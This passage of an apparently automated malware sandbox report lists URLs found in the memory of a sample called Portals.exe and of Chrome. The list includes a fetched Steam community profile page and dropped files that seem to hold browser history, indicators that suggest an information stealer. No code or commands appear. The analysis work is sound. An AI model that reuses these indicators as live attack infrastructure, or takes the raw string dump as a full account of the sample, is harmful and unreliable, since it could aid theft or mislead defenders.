        Source: Portals.exe, 00000001.00000002.2197855678.000000000139F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
        Source: chrome.exe, 0000000D.00000003.1872766329.0000322C01604000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
        Source: chrome.exe, 0000000D.00000002.1930362714.0000322C014D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore/category/collection/chrome_color_themes?hl=$
        Source: chrome.exe, 0000000D.00000002.1906554825.00000262C1600000.00000002.00000001.00040000.00000016.sdmpString found in binary or memory: https://chrome.google.com/webstore/category/extensions
        Source: chrome.exe, 0000000D.00000002.1923013923.0000322C00DA4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1926228200.0000322C0110C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1927645714.0000322C01248000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1923169099.0000322C00DEC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
        Source: chrome.exe, 0000000D.00000002.1906554825.00000262C1600000.00000002.00000001.00040000.00000016.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en&category=theme81https://myactivity.google.com/myactivity/?u
        Source: chrome.exe, 0000000D.00000002.1906554825.00000262C1600000.00000002.00000001.00040000.00000016.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enCtrl$1
        Source: chrome.exe, 0000000D.00000002.1927038361.0000322C01198000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1927078497.0000322C011A8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1872766329.0000322C01604000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
        Source: chrome.exe, 0000000D.00000002.1906554825.00000262C1600000.00000002.00000001.00040000.00000016.sdmpString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherEnabled
        Source: chrome.exe, 0000000D.00000002.1906554825.00000262C1600000.00000002.00000001.00040000.00000016.sdmpString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalGreylistUrl
        Source: chrome.exe, 0000000D.00000002.1906554825.00000262C1600000.00000002.00000001.00040000.00000016.sdmpString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalSitelistUrl
        Source: chrome.exe, 0000000D.00000002.1906554825.00000262C1600000.00000002.00000001.00040000.00000016.sdmpString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlGreylist
        Source: chrome.exe, 0000000D.00000002.1906554825.00000262C1600000.00000002.00000001.00040000.00000016.sdmpString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlList
        Source: chrome.exe, 0000000D.00000002.1906554825.00000262C1600000.00000002.00000001.00040000.00000016.sdmpString found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUseIeSitelist
        Source: chrome.exe, 0000000D.00000003.1821085451.000032280048C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/
        Source: chrome.exe, 0000000D.00000002.1932819325.0000322C01B7C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1820824379.0000322800184000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1917774251.0000322800604000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
        Source: chrome.exe, 0000000D.00000003.1821085451.000032280048C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
        Source: chrome.exe, 0000000D.00000002.1932819325.0000322C01B7C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1820824379.0000322800184000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1917774251.0000322800604000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
        Source: chrome.exe, 0000000D.00000003.1821065761.0000322800468000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1932925486.0000322C01C14000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1820991950.0000322800458000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1821085451.000032280048C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
        Source: chrome.exe, 0000000D.00000002.1932819325.0000322C01B7C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1820824379.0000322800184000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1917774251.0000322800604000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
        Source: chrome.exe, 0000000D.00000003.1821085451.000032280048C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/https://google-ohttp-relay-join.fastly-edge.com/
        Source: chrome.exe, 0000000D.00000002.1920960041.0000322C0081C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromemodelexecution-pa.googleapis.com/v1:Execute?key=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNh
        Source: chrome.exe, 0000000D.00000002.1920960041.0000322C0081C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromemodelquality-pa.googleapis.com/v1:LogAiData?key=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNh
        Source: chrome.exe, 0000000D.00000002.1918939961.0000322C00238000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
        Source: chrome.exe, 0000000D.00000002.1918939961.0000322C00238000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
        Source: chrome.exe, 0000000D.00000002.1906554825.00000262C1600000.00000002.00000001.00040000.00000016.sdmpString found in binary or memory: https://chromestatus.com/features#browsers.chrome.status%3A%22Deprecated%22
        Source: chrome.exe, 0000000D.00000002.1918658950.0000322C001A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/
        Source: chrome.exe, 0000000D.00000002.1921653281.0000322C00978000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/category/extensions
        Source: chrome.exe, 0000000D.00000002.1921653281.0000322C00978000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/category/themes
        Source: chrome.exe, 0000000D.00000002.1918902930.0000322C00210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/
        Source: chrome.exe, 0000000D.00000003.1819227966.00005C50000DC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
        Source: chrome.exe, 0000000D.00000002.1921596827.0000322C0093C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1918629221.0000322C00190000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1926067277.0000322C010EC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1918658950.0000322C001A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1918939961.0000322C00238000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1921160880.0000322C00866000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
        Source: chrome.exe, 0000000D.00000002.1921038871.0000322C00834000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
        Source: chrome.exe, 0000000D.00000002.1921038871.0000322C00834000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
        Source: chrome.exe, 0000000D.00000002.1921038871.0000322C00834000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
        Source: chrome.exe, 0000000D.00000002.1918939961.0000322C00238000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync
        Source: chrome.exe, 0000000D.00000002.1918939961.0000322C00238000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync/event
        Source: chrome.exe, 0000000D.00000002.1921160880.0000322C00866000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=134
        Source: Portals.exe, 00000001.00000002.2197855678.000000000139F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=J1-T6FXbrr0Z&a
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=GlKQ1cghJWE2&amp;l=english&amp;_c
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp;l=english&a
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=eng
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englis
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://community.fastly.steamstatic.com/public/images/badges/48_communitycontributor/1_80.png?v=2
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=jfdbROVe
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=39xC
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=cMt-H-zOgNUp&amp;l=english&am
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&amp;l
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&amp;l=engl
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&a
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&amp;l=english&a
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=en
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&amp;l=eng
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp;l=e
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=whw8EcafG167&amp;l=e
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&
        Source: 76561199829660832[1].htm.1.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=engl
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&amp;l=en
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=PCCoCNLxwF4M&am
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&amp;l=en
        Source: Portals.exe, 00000001.00000002.2199005147.0000000003D2B000.00000004.00000020.00020000.00000000.sdmp, ct26fk.1.drString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
        Source: Portals.exe, 00000001.00000002.2199005147.0000000003D2B000.00000004.00000020.00020000.00000000.sdmp, ct26fk.1.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
        Source: chrome.exe, 0000000D.00000002.1928867201.0000322C0136C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/cdt1
        Source: chrome.exe, 0000000D.00000002.1928867201.0000322C0136C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/cdt1Cross-Origin-Opener-Policy:
        Source: chrome.exe, 0000000D.00000002.1928867201.0000322C0136C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/cdt1
        Source: chrome.exe, 0000000D.00000002.1919532700.0000322C0045C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
        Source: chrome.exe, 0000000D.00000002.1922074575.0000322C00A6D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/:
        Source: chrome.exe, 0000000D.00000002.1922074575.0000322C00A6D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
        Source: chrome.exe, 0000000D.00000002.1922074575.0000322C00A6D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/J
        Source: chrome.exe, 0000000D.00000002.1932925486.0000322C01C14000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview
        Source: chrome.exe, 0000000D.00000002.1932819325.0000322C01B7C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1820824379.0000322800184000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1917774251.0000322800604000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview2K
        Source: chrome.exe, 0000000D.00000002.1922074575.0000322C00A6D000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1920575603.0000322C006B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
        Source: chrome.exe, 0000000D.00000002.1922744575.0000322C00CA0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1922271085.0000322C00B0C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1930185486.0000322C01450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
        Source: chrome.exe, 0000000D.00000002.1922744575.0000322C00CA0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1922271085.0000322C00B0C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1930185486.0000322C01450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
        Source: chrome.exe, 0000000D.00000002.1922074575.0000322C00A6D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/:
        Source: chrome.exe, 0000000D.00000002.1922074575.0000322C00A6D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
        Source: chrome.exe, 0000000D.00000002.1922074575.0000322C00A6D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/J
        Source: chrome.exe, 0000000D.00000002.1922074575.0000322C00A6D000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1920575603.0000322C006B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
        Source: chrome.exe, 0000000D.00000002.1922744575.0000322C00CA0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1922271085.0000322C00B0C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1930185486.0000322C01450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
        Source: chrome.exe, 0000000D.00000002.1922074575.0000322C00A6D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/:
        Source: chrome.exe, 0000000D.00000002.1922074575.0000322C00A6D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
        Source: chrome.exe, 0000000D.00000002.1922074575.0000322C00A6D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/J
        Source: chrome.exe, 0000000D.00000002.1922074575.0000322C00A6D000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1920575603.0000322C006B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
        Source: chrome.exe, 0000000D.00000002.1922744575.0000322C00CA0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1922271085.0000322C00B0C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1930185486.0000322C01450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
        Source: chrome.exe, 0000000D.00000002.1922074575.0000322C00A6D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/:
        Source: chrome.exe, 0000000D.00000002.1922074575.0000322C00A6D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2
        Source: chrome.exe, 0000000D.00000002.1922074575.0000322C00A6D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/J
        Source: chrome.exe, 0000000D.00000002.1922074575.0000322C00A6D000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1920575603.0000322C006B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
        Source: iekxl6.1.drString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: Portals.exe, 00000001.00000002.2199617855.00000000042A3000.00000004.00000020.00020000.00000000.sdmp, iekxl6.1.drString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
        Source: iekxl6.1.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: chrome.exe, 0000000D.00000003.1873062161.0000322C016A8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1872836614.0000322C016D0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1873133282.0000322C01640000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fonts.google.com/icons?selected=Material
        Source: iekxl6.1.drString found in binary or memory: https://gemini.google.com/app?q=
        Source: chrome.exe, 0000000D.00000002.1932925486.0000322C01C14000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/glic
        Source: chrome.exe, 0000000D.00000002.1932925486.0000322C01C14000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/glic/intro?
        Source: chrome.exe, 0000000D.00000002.1932819325.0000322C01B7C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1820824379.0000322800184000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1917774251.0000322800604000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/glic/intro?20
        Source: chrome.exe, 0000000D.00000002.1932819325.0000322C01B7C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1820824379.0000322800184000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1917774251.0000322800604000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/glic2
        Source: chrome.exe, 0000000D.00000003.1820991950.0000322800458000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1821085451.000032280048C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
        Source: chrome.exe, 0000000D.00000002.1932819325.0000322C01B7C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1820824379.0000322800184000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1917774251.0000322800604000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
        Source: chrome.exe, 0000000D.00000002.1932925486.0000322C01C14000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/PrivacySandboxAdsAPIsM1Override
        Source: chrome.exe, 0000000D.00000003.1820991950.0000322800458000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1821085451.000032280048C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
        Source: chrome.exe, 0000000D.00000002.1932819325.0000322C01B7C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1820824379.0000322800184000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1917774251.0000322800604000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
        Source: chrome.exe, 0000000D.00000003.1821085451.000032280048C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
        Source: chrome.exe, 0000000D.00000003.1821085451.000032280048C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
        Source: chrome.exe, 0000000D.00000002.1917878867.0000322C00004000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1918902930.0000322C00210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://google.com/
        Source: chrome.exe, 0000000D.00000002.1921485754.0000322C0091C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://googleusercontent.com/
        Source: chrome.exe, 0000000D.00000002.1933012783.0000322C01CFC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs
        Source: chrome.exe, 0000000D.00000002.1932819325.0000322C01B7C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1820824379.0000322800184000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1917774251.0000322800604000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs2e
        Source: Portals.exe, 00000001.00000002.2197855678.000000000139F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://help.steampowered.com/en/
        Source: ct26fk.1.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
        Source: chrome.exe, 0000000D.00000002.1922864243.0000322C00D0C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1922454214.0000322C00BB0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1931377313.0000322C0172C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
